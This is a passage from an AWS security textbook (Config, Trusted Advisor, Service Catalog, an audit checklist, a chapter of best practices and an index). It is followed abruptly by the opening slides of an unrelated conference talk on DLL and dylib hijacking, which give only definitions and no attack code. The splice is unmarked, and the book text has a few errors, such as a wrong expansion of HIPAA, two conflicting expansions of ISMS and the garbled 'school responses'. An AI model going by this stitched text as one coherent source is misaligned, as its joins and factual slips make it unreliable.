assessment, security vulnerabilities can be detected in near real-time and the
security posture of your environment can be examined. You can create 50 rules in
your AWS account. This is a soft limit and can be increased by contacting the
AWS Support.
The following figure shows a typical AWS Config dashboard. On the top left of the image, it
shows Total resource count as 53 for this AWS account. There is 1 Noncompliant rule(s)
and there are 2 noncompliant resources(s). It also gives details about noncompliant rules,
in this case it is encrypted-volumes:
Figure 18 - AWS Config dashboard
Logging and Auditing in AWS
[ 209 ]
AWS Trusted Advisor
AWS Trusted Advisor provides you with recommendations and real-time guidance on the
following four areas to optimize your resources as per AWS best practices:
Cost optimization
Performance
Security
Fault tolerance
This service analyzes and checks your AWS environment in real-time on an ongoing basis.
It integrates with AWS IAM so you can control access to checks as well as to categories. The
status of these checks is displayed in the AWS Trusted Advisor dashboard under the
following color coded scheme:
Red: Action recommended
Yellow: Investigation recommended
Green: No problem detected
For all checks where the color is red or yellow, this service will provide alert criteria,
recommended actions, and investigations along with resource details, such as details of the
security groups that allow unrestricted access for specific ports.
By default, six core checks are available for all AWS customers, without any additional
charges, to improve security and performance. These checks include five checks for security
and one check for performance, that is, service limits, IAM use, security groups-unrestricted
ports, MFA on root account, Elastic block storage public snapshot, and RDS public
snapshot.
You can track any changes to status checks as most recent changes are placed at the top of
the list in the AWS Trusted Advisor dashboard. You can refresh checks individually or
refresh all at once. You can refresh a check once it is not refreshed for 5 minutes.
For other checks that are available with business or enterprise AWS support plans, you get
the full benefits of AWS Trusted Advisor service. Apart from checks, you also get access to
notifications with AWS weekly updates for your resource deployment. Alongside this, you
also get programmatic access to AWS Trusted Advisor through the AWS Support API. This
programmatic access allows you to retrieve and refresh AWS Trusted Advisor results.
Logging and Auditing in AWS
[ 210 ]
AWS Service Catalog
AWS Service Catalog is a web service that enables organizations to enforce compliance by
creating and managing pre-defined templates of AWS resources and services in the form of
catalogs. These AWS resources and services can be EC2 instances, S3 buckets, EBS volumes,
ELBs, databases, and so on that are required for running your applications in your IT
environment. A Service Catalog will contain pre-approved resources for your users to
provision and ensure a compliance and continuous governance across your AWS account.
AWS Service Catalog allows you to centrally manage your IT services in catalogs. You
control availability, versions, and configuration of these IT services to people, departments,
and cost centers in your organization to ensure compliance and adherence to corporate
standards.
With a Service Catalog in place, your employees can go to project portfolios and quickly
find and provision approved resources required to accomplish their task. When you update
a product with a new version, your users are automatically notified of a new version
update. Moreover, you can restrict resources geographically, such as allowing resources to
be available only in certain AWS regions and allowable IP ranges as well.
This service integrates with AWS marketplace so you can add all products that you
purchase from AWS Marketplace in the products catalog. You also have an option to tag
your products. AWS Service Catalog provides you with a dashboard, products list, and
provisioned products list in the AWS Management Console.
The following image depicts features available in the AWS Service Catalog. You can create
and manage portfolios for your projects or assignments, add products such as AWS services
or other resources in these portfolios along with all versions, configurations, and various
constraints, and you can also manage user access to ensure how these products can be
provisioned, who can use them, and where these products can be used:
Figure 19 - AWS Service Catalog
Logging and Auditing in AWS
[ 211 ]
AWS Security Audit Checklist
As an auditing best practice, ensure that security audits are performed periodically for your
AWS account to meet compliance and regulatory requirements. To begin with, use AWS
Trusted Advisor to audit security for your AWS account. Apart from periodic activity, an
audit should be carried out in case of the following events:
Changes in your organization
One or more AWS services are no longer used
If there is a change in the software or hardware configuration for your resources
If there is a suspicious activity detected
The following is a list of AWS controls to be audited for security:
Governance
Network configuration and management
Asset configuration and management
Logical access control
Data encryption
Security logging and monitoring
Security incident response
Disaster recovery
Inherited controls
Along with this checklist, there are various other guides to help you with auditing your
AWS resources and AWS usage. Some of these guides are as follows and are available in the
AWS auditor learning path at https://aws.amazon.com/compliance/auditor-learning-
path/:
AWS security audit guidelines
Introduction to auditing the use of AWS
Cybersecurity initiative audit guide
Logging and Auditing in AWS
[ 212 ]
Summary
In this chapter, we went through the following core principles of a security solution in any
IT environment, and understood how they are tightly coupled with each other:
Logging
Auditing
Risk
Compliance
We learnt about various services, tools, and features available in AWS to make our
environment compliant and remain compliant. We looked at logging options available for
major AWS services and how logging can be automated in multiple ways.
We learnt how we can use AWS CloudTrail along with S3 and CloudWatch Logs to
automate storage, analysis, and notification of log files. We deep dived into best practices,
features, use cases, and so on for AWS CloudTrail to understand logging at an extensive
scale in AWS.
Furthermore, we looked into auditing in AWS, various services available for AWS users to
enforce and ensure compliance, providing guardrails, and freedom to users to provision
approved resources. We learnt about the AWS customer compliance center and AWS
auditor learning path, dedicated resources for all those who work closely with audit and
compliance.
In this section, we went over the following AWS services and learnt how each of them play
a part in auditing, risks, and compliance in AWS:
AWS Artifact
AWS Config
AWS Trusted Advisor
AWS Service Catalog
Lastly, we learnt about auditing the security checklist and other guidelines and resources
available for auditing usage in AWS.
In the next chapter, AWS Security Best Practices, we will learn about AWS security best
practices. It will be a culmination of all that we have learnt so far in all the previous
chapters regarding security in AWS. We will learn about solutions to ensure that best
practices are met for all topics such as IAM, VPC, security of data, security of servers, and
so on.
9
AWS Security Best Practices
Security at AWS is job zero. AWS is architected to be one of the most secure cloud
environments with a host of built-in security features that allows it to eliminate most of the
security overhead that is traditionally associated with IT infrastructure. Security is
considered a shared responsibility between AWS and AWS customers where both of them
work together to achieve their security objectives. We have looked at various services, tools,
features, and third-party solutions provided by AWS to secure your assets on AWS. All
customers share the following benefits of AWS security without any additional charges or
resources:
Keeping your data safe
Meeting compliance requirements
Saving money with in-built AWS security features
Scaling quickly without compromising security
An enterprise running business-critical applications on AWS cannot afford to compromise
on the security of these applications or the AWS environment where these applications are
running. As per Gartner, by 2020, 95% of all security breaches or incidents in cloud will be due to
customer error and not from the cloud provider.
Security is a core requirement for any Information Security Management System (ISMS)
to prevent information from unauthorized access; theft, deletion, integrity compromise, and
so on. A typical ISMS is not required to use AWS, however, AWS has a set of best practices
lined up under the following topics to address widely adopted approaches for ensuring
security for ISMS. You can use this approach if you have an ISMS in place:
What shared security responsibility model is and how it works between AWS
and customers
Categorization and identifying your assets
AWS Security Best Practices
[ 214 ]
How to use privileged accounts and groups to control and manage user access to
your data?
Best practices for securing your data, network, servers, and operating systems
How to achieve your security objectives using monitoring and alerting?
For more information on best practices on securing your ISMS, refer to the AWS Security
Center at https://aws.amazon.com/security/. You can also use AWS Security Center for
staying updated with the most common security issues and solutions to address these
issues.
Security by design: There are the following two broad aspects of security in AWS:
Security of AWS environment: AWS provides many services, tools, and features
to secure your entire AWS environment including systems, networks, and
resources such as encryption services, logging, configuration rules, identity
management, and so on.
Security of hosts and applications: Along with your AWS environment, you also
need to secure applications that are running on AWS resources, data stored in the
AWS resources, and operating systems on servers in AWS. This responsibility is
primarily managed by AWS customers. AWS provides all tools and technologies
available on-premises and used by the customer in AWS cloud as well.
Security by design is a four-phase systematic approach to ensure continuous security,
compliance, and real-time auditing at scale. It is applicable for the security of AWS
environment that allows for automation of security controls and streamlined audit
processes. It allows customers to imbibe security and compliance reliably coded into AWS
account. The following are four-phases of the Security by design approach:
Understand your requirements
Build a secure environment
Enforce the use of templates
Perform validation activities
Security in AWS is distributed at multiple layers such as AWS products and services, data
security, application security, and so on. It is imperative to follow best practices for securing
all such products and services to avoid getting your resources compromised in the AWS
cloud.
AWS Security Best Practices
[ 215 ]
Security is the number one priority for AWS and it is a shared responsibility between AWS
and its customers. Security is imperative for all workloads deployed in the AWS
environment. In AWS, storage is cheap, it should be used to store all logs and relevant
records. It is recommended to use AWS managed services and in-built reporting services as
much as possible for security to offload heavy lifting and enabling automation.
In this chapter, we will go over security best practices in AWS. These best practices are a
combination of AWS recommendations, as well as expert advice and most common
practices to follow in order to secure your AWS environment.
Our objective is to have a minimum security baseline for our workloads in the AWS
environment by following these best practices that are spread across AWS services,
products, and features. These security measures allow you to get visibility into the AWS
usage and AWS resources and take corrective actions when required. They also allow
automation at multiple levels, such as at the infrastructure level or at the application level to
enable continuous monitoring and continuous compliance for all workloads deployed in
AWS along with all AWS resources used in your AWS account.
We will learn about security best practices for the following topics:
Shared security responsibility model
IAM
VPC
Data security
Security of servers
Application security
Monitoring, logging, and auditing
We will also look at Cloud Adoption Framework (CAF) that helps organizations
embarking on their cloud journey with standards, best practices, and so on.
We will learn about the security perspective of CAF along with the following four
components:
Preventive
Responsive
Detective
Directive
AWS Security Best Practices
[ 216 ]
Shared security responsibility model
One of the first and most important requirements and security best practice to follow is to
know about the AWS shared security responsibility model. Ensure that all stakeholders
understand their share of security in AWS.
AWS is responsible for the security of cloud and underlying infrastructure that powers
AWS cloud, and customers are responsible for security in the cloud, for anything they put
in, and build on top of the AWS global infrastructure.
It is imperative to have clear guidelines about this shared security responsibility model in
your organization. Identify resources that fall under your share of responsibilities, define
activities that you need to perform, and publish a schedule of these activities to all
stakeholders. The following figure shows the AWS shared security responsibility model:
Figure 1 - AWS shared security responsibility model
IAM security best practices
IAM provides secure access control in your AWS environment to interact with AWS
resources in a controlled manner:
Delete your root access keys: A root account is one that has unrestricted access to
all AWS resources in your account. It is recommended that you delete access
keys, access key IDs, and the secret access key for the root account so that they
cannot be misused. Instead, create a user with the desired permissions and carry
on tasks with this user.
AWS Security Best Practices
[ 217 ]
Enforce MFA: Add an additional layer of security by enforcing MFA for all
privileged users having access to critical or sensitive resources and APIs having a
high blast radius.
Use roles instead of users: Roles are managed by AWS; they are preferred over
IAM users, as credentials for roles are managed by AWS. These credentials are
rotated multiple times in a day and not stored locally on your AWS resource such
as an EC2 instance.
Use access advisor periodically: You should periodically verify that all users
having access to your AWS account are using their access privileges as assigned.
If you find that users are not using their privilege for a defined period by running
the access advisor report, then you should revoke that privilege and remove the
unused credentials. The following figure shows the security status as per AWS
recommended IAM best practices in the AWS Management Console:
Figure 2 - AWS IAM security best practices
VPC
VPC is your own virtual, secured, scalable network in the AWS cloud that contains your
AWS resources. Let us look at the VPC security best practices:
Create custom VPC: It is recommended to create your own VPC and not use the
default VPC as it has default settings to allow unrestricted inbound and
outbound traffic.
Monitor VPC activity: Create VPC flow logs to monitor flow of all IP traffic in
your VPC from network resources to identify and restrict any unwanted activity.
Use Network Address Translation (NAT): Keep all your resources that do not
need access to the internet in a private subnet. Use a NAT device, such as a NAT
instance or NAT gateway to allow internet access to resources in a private subnet.
AWS Security Best Practices
[ 218 ]
Control access: Use IAM to control access to the VPC and resources that are part
of the VPC. You can create a fine grained access control using IAM for resources
in your VPC.
Use NACL: Configure NACLs to define which traffic is allowed and denied for
your VPC through the subnet. Control inbound and outbound traffic for your
VPC. Use NACL to block traffic from specific IPs or range of IPs by blacklisting
them.
Implement IDS/IPS: Use AWS solutions for Intrusion Detection System (IDS)
and Intrusion Prevention System (IPS) or reach out to AWS partners at the AWS
marketplace to secure your VPC through one of these systems.
Isolate VPCs: Create separate VPCs as per your use cases to reduce the blast
radius in the event of an incident. For example, create separate VPCs for your
development, testing, and production environments.
Secure VPC: Utilize the web application firewall, firewall virtual appliance, and
firewall solutions from the AWS marketplace to secure your VPC. Configure site
to site VPN for securely transferring data between your on-premise data center
and the AWS VPC. Use the VPC peering feature to enable communication
between two VPCs in the same region. Place ELB in a public subnet and all other
EC2 instances in a private subnet unless they need to access the internet by these
instances.
Tier security groups: Use different security groups for various tiers of your
architecture. For example, have a security group for your web servers and have
another one for database servers. Use security groups for allowing access instead
of hard coded IP ranges while configuring security groups.
Data security
Encryption: As a best practice to secure your data in AWS, encrypt everything!
Encrypt your data at rest in AWS across your storage options. Automation and
omnipresent, that's how you should design your encryption. Encrypting data
helps you in the following ways:
Privacy
Integrity
Reliability
Anonymity
AWS Security Best Practices
[ 219 ]
Use KMS: Encryption using keys rely heavily on availability and security of keys.
If you have the key, you have the data. Essentially, whoever owns the key, owns
the data. So, ensure that you use a reliable and secure key management
infrastructure for managing all your keys. AWS KMS is a fully managed service
available for all your key management needs. Use this to manage your keys for
encrypting data in S3, RDS, EBS volumes, and so on. Also, ensure that you
control access to these keys through IAM permissions and policies.
Rotate your keys: Ensure that keys are rotated periodically, usually quite
frequently. The longer a key lives the higher is the security risk attached to it.
Classify your data: Secure your data by classifying it, such as type of data, is it
confidential information or is it publicly available? What would be the impact of
loss or theft of this data? How sensitive is this data? What are the retention
policies attached with this data? Moreover, classify data based on usage. Once
you classify your data, you can choose the appropriate level of security controls
and storage options in AWS for storing your data.
Secure data in transit: Create a secure listener for your ELB to enable traffic
encryption between clients initiating secure connection such as Secure Socket
Layer (SSL) or Transport Layer Security (TLS) and your AWS ELB. This will
help you secure your data in transit as well for applications running on EC2
instances. You can have similar configurations, known as TLS termination for
other AWS services, such as Redshift, RDS, and all API endpoints. Use VPN, VPC
Peering and Direct Connect to securely transfer data through VPC to other data
sources.
S3 bucket permissions: Ensure that you do not have world readable and world
listable S3 buckets in your account. Restrict access to your buckets using IAM,
access control lists, and bucket policies.
Security of servers
Let us look at best practices to secure your servers in AWS cloud:
Use IAM roles for EC2: Always use IAM roles instead of IAM users for
applications running on your EC2 instances. Assign a role to your EC2 instance
for accessing other AWS services. This way, credentials for the role will not be
stored in your EC2 instance like they are in case of an IAM user.
Use ELB: Put all your EC2 instances behind AWS ELB when applicable. In this
configuration, you will shield your instances from receiving traffic directly from
the internet and they will receive traffic only from the AWS ELB.
AWS Security Best Practices
[ 220 ]
Security group configuration: A security group is a virtual firewall for your
instance. It is imperative to configure it to secure your instances. Avoid allow all
traffic, that is, opening up all ports for CIDR range of 0.0.0.0/0 in your security
group. Instead, allow a limited range of IP addresses to access your EC2
instances. Similarly, for your web servers, allow traffic only on port 80 and port
443 for HTTP and HTTPS traffic.
Use Web Application Firewall (WAF): Use WAF and AWS shields to mitigate
the risk of Denial of Service (DoS) or Distributed Denial of Service (DDoS)
attacks. WAF lets you monitor traffic for your web application. It features deep
packet inspection of all web traffic for your instances and allows you to take
proactive action. You can set rules in WAF to blacklist IP addresses serving
unwanted traffic to your web application.
Secured access: Configure access for your servers using IAM. Use roles,
federated access, or IAM users based on access requirements. Ensure that
.pem files are password protected on all machines that need access to
instances. Rotate credentials such as access keys that are required to access your
instances. Use Secure Token Service (STS) for granting temporary credentials
instead of using IAM user credentials.
Backup and recovery: Use snapshots to back up all data and configuration stored
on your servers. Create Amazon Machine Image (AMI) for your instance to use
in the event of a disaster to recover your instance. Ensure that you are regularly
testing the backup and recovery process for your servers.
EC2 termination protection: Always enable termination protection for your
mission-critical EC2 instances so your instances do not get accidentally deleted
through an API request or through the AWS Management Console.
Application security
Let us look at best practices to secure applications developed and deployed in AWS servers
and other AWS resources:
Use web application firewall: Always use WAF to detect and filter unwanted
HTTP and HTTPS traffic for your web application. Automate WAF rules to block
such traffic by integrating with AWS Lambda. Implement DevOps culture in
your organization, ensuring that securing is not just responsibility of operations,
instead, security should be built-in inside applications.
AWS Security Best Practices
[ 221 ]
Amazon Inspector: Use an agent-based security assessment, such as an AWS
Inspector for your web applications and for servers that are used to run these
web applications. It has built-in rule packages to identify common vulnerabilities
for various standards and benchmarks. You can automate security responses by
configuring APIs of Amazon Inspector. You should regularly run these
assessments to ensure there isn't any security threat as per the existing
configuration for your web application and servers.
Penetration testing: AWS allows you to conduct vulnerability and penetration
testing for all your EC2 instances. You need to request the AWS console and AWS
support to conduct these tests in advance before you actually conduct them.
Utilize AWS security tools: AWS provides several tools for encryption and key
management such as KMS and cloud hardware security module, firewalls such as
web application firewall, AWS shield, security groups, and NACLs, and so on.
Integrate your application with these tools to provide greater security and threat
protection.
Monitoring, logging, and auditing
Let us look at best practices for monitoring, logging, and auditing in AWS:
Log everything: AWS provides AWS CloudTrail that logs all API activities for
your AWS account. Enable this service for all regions and create a trail to audit
these activities whenever required. Take advantage of the AWS cloud-native
logging capabilities for all AWS services. Collect, store, and process logs for
infrastructure such as VPC flow logs, AWS services, and logs for your
applications to ensure continuous monitoring and continuous compliance. Use
CloudWatch Logs to process all log data, and S3 for storing it.
Enable AWS CloudWatch: Ensure that you are using AWS CloudWatch to
monitor all your resources in AWS including data, services, servers, applications,
and other AWS native tools and features such as ELBs, auto scaling groups, and
so on. Use metrics, dashboards, graphs, and alarms to create preventive solutions
for security incidents.
Continuous compliance: Use AWS Trusted Advisor to proactively check for
issues related to security configuration of your AWS resources. Set up a pre-
defined inventory for all your hardware and software resources including
versions and configurations in the AWS service catalog to provide a guardrail for
your users, helping them to choose only compliant resources for their workloads.
Use AWS Config to notify the user in real time about changes in configuration
from their pre-defined configuration of resources.
AWS Security Best Practices
[ 222 ]
Automate compliance and auditing: Use combinations of AWS CloudTrail, AWS
SNS, AWS Lambda, AWS Config Rules, CloudWatch Logs, CloudWatch Alerts,
Amazon Inspector, and so on to automate compliance and auditing for all
resources and all workloads deployed in your AWS account.
AWS CAF
AWS CAF helps organizations migrating to cloud computing in their cloud adoption
journey by providing best practices and guidance through this framework. It breaks down
this guidance into manageable areas of focus for building cloud-based systems that can be
mapped to individual units of organizations. These focus areas are known as perspectives,
there are six of these. Each perspective is further broken into components.
There are three perspectives, each for business (business, people, and governance) and
technology (platform, security, and operations) stakeholders as shown in the following
figure:
Figure 3 - AWS Cloud Adoption Framework perspectives
Each perspective is made up of responsibilities owned by one or more stakeholders known
as CAF capabilities. These capabilities are standards, skills, and processes that define what
is owned and/or managed by these stakeholders for their organizations cloud adoption
journey. You would map these capabilities with roles within your organizations and
identify gaps in your existing stakeholder, standards, skills, and processing towards your
cloud journey.
AWS Security Best Practices
[ 223 ]
Security perspective
The security perspective provides guidance for aligning organizational requirements
relating to security control, resilience, and compliance for all workloads developed and
deployed in AWS cloud. It lists out processes and skills required for stakeholders to ensure
and manage security in cloud. It helps you select security controls and structure them as per
your organization's requirements to transform the security culture in your organization.
The security perspective has capabilities that target the following roles in an organization:
Chief Information Security Officer, IT Security Managers, IT Security Analysts, Head of
Audit and Compliance, and all resources in Auditing and Compliance roles.
The security perspective consists of the following four components:
Directive component
This component provides guidance to all stakeholders that are either operating or
implementing a security controls in your environment on planning your security approach
for migrating to the AWS cloud. It includes controls, such as security operations playbook
and runbooks, least privilege access, data locality, change and asset management, and so
on. The directive component includes activities such as monitoring the teams through
centralized phone and email distribution lists, integrating development, security, and
operations teams roles and responsibilities to create a culture of DevSecOps in your
organizations.
Preventive component
This component is responsible for providing guidance for implementing a security
infrastructure within your organization and with AWS. You should enable your security
teams to build skills such as automation, deployment for securing your workloads in agile,
dynamic, elastic, and scalable cloud environments. This component builds on identification
of security controls as identified in the directive component. In this component, you learn to
work with these controls, for example, you will look at your data protection policies and
procedures and tweak them if required. Similarly, you will revisit your identity and access
measures and infrastructure protection measures too. Consider establishing a minimum
security baseline as part of this component.
AWS Security Best Practices
[ 224 ]
Detective component
This component deals with logging and monitoring to help you gain visibility into the
security posture of your organization. Logging and monitoring along with events analysis,
testing will give you operational agility as well as transparency for security controls you
have defined and operate regularly. This component includes activities such as security
testing, asset inventory, monitoring and logging, and change detection. You should
consider defining your logging requirements keeping AWS native logging capabilities in
mind alongside conducting vulnerability scans and penetration testing as per AWS pre-
defined process.
Responsive component
This chapter guides you to respond to any security events for your organization by
incorporating your existing security policies with AWS environment. It guides you to
automate your incident response and recovery processes thereby enabling you to provide
more resources toward performing forensics and root cause analysis activities for these
incidents. It includes activities such as forensics, incident response, and security incident
response simulations. You should consider updating and automating your school responses
as per the AWS environment and validating them by running simulations.
Summary
In this chapter, we went over security best practices for all the topics we have covered in all
previous chapters, such as IAM, VPC, security of data, security of servers, and so on.
Throughout this chapter, we have focused on and emphasized on security automation by
utilizing AWS native services, tools, and features. AWS security best practices echo similar
recommendations as well to create a software-defined, self-healing environment by using
AWS-managed services instead of building something manually.
We also learnt about AWS CAF, that is used by hundreds of organizations to help them
migrate to cloud in their cloud journey. We deep dived into the security perspective of this
framework and learnt about four components of security perspective that will help us
secure our workloads while migrating to the AWS cloud.
Index
A
access control list (ACL) 20, 75, 116
account security features
about 25
AWS account 25
AWS config security checks 29
AWS credentials 26
AWS trusted advisor security checks 28
secure HTTPS access points 27
security logs 27
alarms 172
Amazon API Gateway
about 159
benefits 159
Amazon CloudFront Access Logs 190
Amazon Cognito 158
Amazon DynamoDB 116
Amazon EBS
about 114
backup 115
encryption 115
replication 115
Amazon EC2
automated monitoring tools 176, 177, 180
manual monitoring tools 180
monitoring 176
Amazon EMR 116
Amazon Glacier 116
Amazon Inspector dashboard
assessment report 144
assessment run 144
assessment target 144
assessment template 146
AWS agent 144
finding 144
rules 145
rules package 144
Amazon Inspector
about 140
components 143
features 141
Amazon Machine Image (AMI) 12, 130, 173, 220
Amazon Macie
about 124
data classification 124
data discovery 124
data security 125
Amazon RDS Logs 190
Amazon Resource Name (ARN) 43, 59, 93
Amazon S3 Access Logs 188
Amazon S3
about 113
client-side encryption 114
permissions 113
replication 114
server-side encryption 114
versioning 113
Amazon Virtual Private Cloud (VPC) 116
Amazon VPC Flow Logs 191
Application Programming Interface (API) 42
application security
best practices 220
auditing, in AWS
about 205
best practices 221
AWS account root user 56
AWS actions
reference link 62
AWS API Requests
signing 157
AWS Artifact 33, 206
AWS blogs
about 35
[ 226 ]
reference link 35
AWS CAF
about 222
security perspective 223
AWS case studies
about 34
reference link 34
AWS CloudHSM
about 121
features 122, 123
use cases 123, 124
AWS CloudTrail
about 32, 187, 197
benefits 199
best practices 204
concepts 198
lifecycle 197
use cases 200, 201, 202
AWS CloudWatch Logs
about 192
concepts 192
lifecycle 195, 196
limitations 195
AWS CloudWatch
about 32, 163
benefits 165, 166, 167
components 167
features 164, 166
AWS Config
about 33, 188, 207
use cases 208
AWS credentials
about 67
access keys (access key ID and secret access
key) 68
AWS account identifiers 68
email and password 67
IAM username and password 68
key pairs 68
multi-factor authentication (MFA) 68
X.509 certificates 69
AWS Detailed Billing Reports 188
AWS documentation 34
AWS Identity and Access Management 31
AWS infrastructure logs 186
AWS KMS
about 31, 118
benefits 119
components 120
usage, auditing 121
AWS Logging
security 203
AWS marketplace
about 35
reference link 35
AWS Native Security Logging Capabilities
about 186
Amazon CloudFront Access Logs 190
Amazon RDS Logs 190
Amazon S3 Access Logs 188
Amazon VPC Flow Logs 191
AWS CloudTrail 187
AWS Config 188
AWS Detailed Billing Reports 188
best practices 187
ELB Logs 189
AWS partner network
about 35
reference link 35
AWS Security Audit Checklist 211
AWS security resources
about 33
AWS blogs 35
AWS case studies 34
AWS documentation 34
AWS marketplace 35
AWS partner network 35
AWS white papers 34
AWS YouTube channel 34
AWS security services
about 30
penetration testing 33
AWS Service Catalog 210
AWS service logs 186
AWS service role
about 49
cross-account access 51
identity provider access 52
AWS services
abstracted services 10
[ 227 ]
container services 10
infrastructure services 9
shared responsibility model, for abstracted
services 14
shared responsibility model, for container
services 13
shared responsibility model, for infrastructure
services 10
AWS Shield Advanced
about 149
advanced attack mitigation 149
enhanced detection 149
AWS Shield Standard
about 149
inline attack mitigation 149
quick detection 149
AWS Shield
about 146
benefits 148
features 148
AWS Trusted Advisor 209
AWS Virtual Private Cloud 31
AWS VPC
benefits 81
best practices 101
components 76
connectivity options 96, 98
creating 94, 95
features 81, 82, 83
limitations 100
multiple connectivity options 82
use cases 83
AWS Web Application Firewall (WAF)
about 32, 152
benefits 153, 154
conditions 154
rules 155
Web ACL 156
working with 154
AWS white papers
about 34
reference link 34
AWS YouTube channel
about 34
reference link 34
AWS
access 21
account security features 25
business continuity management 17
communication 18
credentials policy 21
customer security responsibilities 22
data security 108
environmental security 16
logs 186
network monitoring 21
network protection 21
network security 20
physical security 16
security responsibilities 15
storage device decommissioning 17
B
best practices, AWS VPC 101
best practices, EC2 Security
audit logs 129
AWS API access, from EC2 instances 130
change management 129
configuration management 129
data encryption 130
least access 129
least privilege 129
network access 130
business continuity and disaster recovery (BCDR)
14
business continuity management 17
C
Cause of Error (COE) 21
Classless Inter-Domain Routing (CIDR) 94
CloudWatch dashboard 181
Command Line Interface (CLI) 42
communication 18
components, AWS CloudWatch
alarms 172
dashboards 169
events 171
log monitoring 174
metrics 167
components, AWS KMS
[ 228 ]
customer master key (CMK) 120
data keys 120
Key Management Infrastructure (KMI) 121
key policies 120
components, AWS VPC
about 76
Elastic IP addresses 79
Elastic Network Interfaces (ENI) 77
Internet gateway 78
Network Address Translation (NAT) 80
route tables 78
subnets 77
VPC endpoints 79
VPC peering 81
concepts, AWS CloudWatch Logs
log agent 193
log events 192
log group 192
log streams 192
metric filters 193
retention policies 193
connectivity options, AWS VPC 96, 98
Content Delivery Network (CDN) 154
credentials policy 21
customer master keys (CMK) 115
customer security responsibilities 22
D
dashboards 169
data security 219
data security, AWS
about 108, 113
Amazon DynamoDB 116
Amazon EBS 114
Amazon EMR 116
Amazon Glacier 116
Amazon S3 113
components 108
DDoS Response Team (DRT) 148, 149
decryption
fundamentals 111
Denial of Service (DoS) 220
disaster recovery (DR) 88
Distributed Denial of Service (DDoS) 32, 146, 220
E
EC2 dashboard 181
EC2 instances
monitoring best practices 181
EC2 Security
about 130
best practices 129
Elastic Load Balancing Security 137
IAM Roles, for EC2 Instances 131
Infrastructure, securing 134, 135
Instance, protecting from Malware 133
Intrusion Detection System (IDS) 136
Intrusion Prevention System (IPS) 136
OS-Level, managing to Amazon EC2 Instances
132
testing 139
Threat Protection Layers, building 137
Elastic Block Storage (EBS) 10, 130, 199
Elastic Block Store (EBS) 9
Elastic Compute Cloud (EC2) 40, 114
Elastic IP (EIP) 105
Elastic IP addresses 79
Elastic Load Balancer (ELB) 103, 137
Elastic Map Reduce (EMR) 10
Elastic Network Interface (ENI) 77, 105, 130, 138,
191
ELB Logs 189
encryption
envelope encryption 112
fundamentals 110
envelope encryption 112
events 171
F
fault tolerance (FT) 14
flow logs 93
G
Global Cloud Index (GCI) 8
H
hardware security module (HSM) 108
Health Insurance Portability and Accounting Act
(HIPAA) 148
[ 229 ]
high availability (HA) 13
host-based logs 186
I
IAM authorization
about 57
access advisor 66
IAM policy simulator 64
IAM policy validator 65
permissions 57
policy 59
policy, creating 63
IAM best practices 70
IAM integrates
reference link 59
IAM limitations
about 69
reference link 70
IAM permission
action-level permissions 58
resource-based permissions 59
resource-level permissions 59
service linked roles 59
tag-based permissions 59
temporary security credentials 59
IAM policy simulator
reference link 64
IAM roles
about 48
account root user 56
AWS Security Token Service 55
AWS service role 49
delegation 54
federation 53
identity provider and federation 53
temporary security credentials 54
IAM security
best practices 216
Identity and Access Management (IAM)
about 10, 108
authentication 42
AWS account shared access 39
AWS command line tools 42
AWS Management Console 41
AWS SDKs 42
features 39
granular permissions 40
groups 46
IAM HTTPS API 42
identity federation 40
resource 62
security 39
temporary credentials 40
tools 39
user 43
Infrastructure Security Management System
(ISMS) 139
inline policies 63
International Data Corporation (IDC) 8
Internet gateway 78
Intrusion Detection System (IDS) 136, 218
Intrusion Prevention System (IPS) 136, 137, 218
J
JavaScript Object Notation (JSON) 59, 171
K
Key Management Infrastructure (KMI) 108
Key Management Service (KMS) 108, 130
L
log agent 193
log events 192
log group 192
log monitoring 174
log streams 192
logs, AWS
best practices 221
host-based logs 186
infrastructure logs 186
service logs 186
M
managed policies
about 62
AWS managed policies 62
customer managed policies 63
metric filter 193
metrics 167
[ 230 ]
monitoring, in AWS
best practices 221
multi-factor authentication (MFA) 203
N
Natural Language Processing (NLP) 125
network access control list (NACL) 91
Network Address Translation (NAT) 80
network monitoring 21
network protection 21
network security
about 20
secure access points 20
secure network architecture 20
transmission protection 20
network traffic, in AWS
Amazon DynamoDB 118
Amazon EMR 118
Amazon RDS 117
Amazon S3 117
Non Disclosure Agreement (NDA) 206
P
passwords policy 66
penetration testing 33
permissions
about 57
identity-based 58
resource-based 58
perspectives
about 222
security perspective 223
policy simulator, testing policies
reference link 65
policy
about 59
action 61
actions 60
condition 62
effect 60, 61
inline policies 63
managed policies 62
principal 61
resources 60
statement 60
Proof of Concept (PoC) 84
R
Relational Database Service (RDS) 10, 33, 165
Remote Desktop Protocol (RDP) 12, 132
retention policies 193
root account 25
route tables 78
rules, AWS Web Application Firewall (WAF)
rate based rules 155
regular rules 155
S
Secure Shell (SSH) 12, 133
Secure Socket Layer (SSL) 20, 27, 117, 219
Secure Token Service (STS) 220
security group 89
security perspective
about 223
directive component 223, 224
preventive component 223
responsive component 224
Security Token Service (STS) 54, 157
security
with AWS Logging 203
servers, in AWS cloud
best practices 219
Service Organization Control (SOC) reports 206
shared responsibility model
for abstracted services 14
for container services 13
for infrastructure services 10
shared security responsibility model 216
Simple Notification Service (SNS) 166, 188
Simple Storage Service (S3) 14, 79, 108
software development kit (SDK)
about 42
reference link 42
storage device decommissioning 17
subnets 77
T
Transport Layer Security (TLS) 27, 117, 130, 137,
219
U
use cases, AWS VPC
branch office, creating 86
business unit networks, creating 86
corporate network, extending in cloud 87
disaster recovery (DR) 88
multi-tier web application, hosting 84
public facing website, hosting 84
web applications, hosting in AWS cloud 87
V
Virtual Private Cloud (VPC) 9, 58
Virtual Private Network (VPN) 20
VPC endpoints 79
VPC peering 81
VPC security
about 89
access control 93
best practices 217
flow logs 92
network access control list (NACL) 91
security groups 89 | pdf |
@patrickwardle
‘DLL Hijacking’ on OS X?
#@%& Yeah!
“leverages the best combination of humans and technology to discover
security vulnerabilities in our customers’ web apps, mobile apps, and
infrastructure endpoints”
WHOIS
@patrickwardle
always looking for
more experts!
implants
backdoor
remotely accessible means of
providing secret control of device
injection
coercing a process to load a module
persistent malicious code
hooking
intercepting function calls
trojan
malicious code that masquerades as
legitimate
gotta make sure we’re all on the same page ;)
SOME DEFINITIONS
what we'll be covering
OUTLINE
history of
dll hijacking
dylib hijacking
attacks
& defenses
}
hijacking
finding
‘hijackables’
loader/linker
features
HISTORY OF DLL HIJACKING
…on windows
an overview
DLL HIJACKING (WINDOWS)
“an attack that exploits the way some
Windows applications search and load
Dynamic Link Libraries (DLLs)”
definition
"binary planting"
"insecure library loading"
"dll loading hijacking"
"dll preloading attack"
other names
<blah>.dll
<blah>.dll
"I need <blah>.dll"
cwd
providing a variety of attack scenarios
DLL HIJACKING ATTACKS
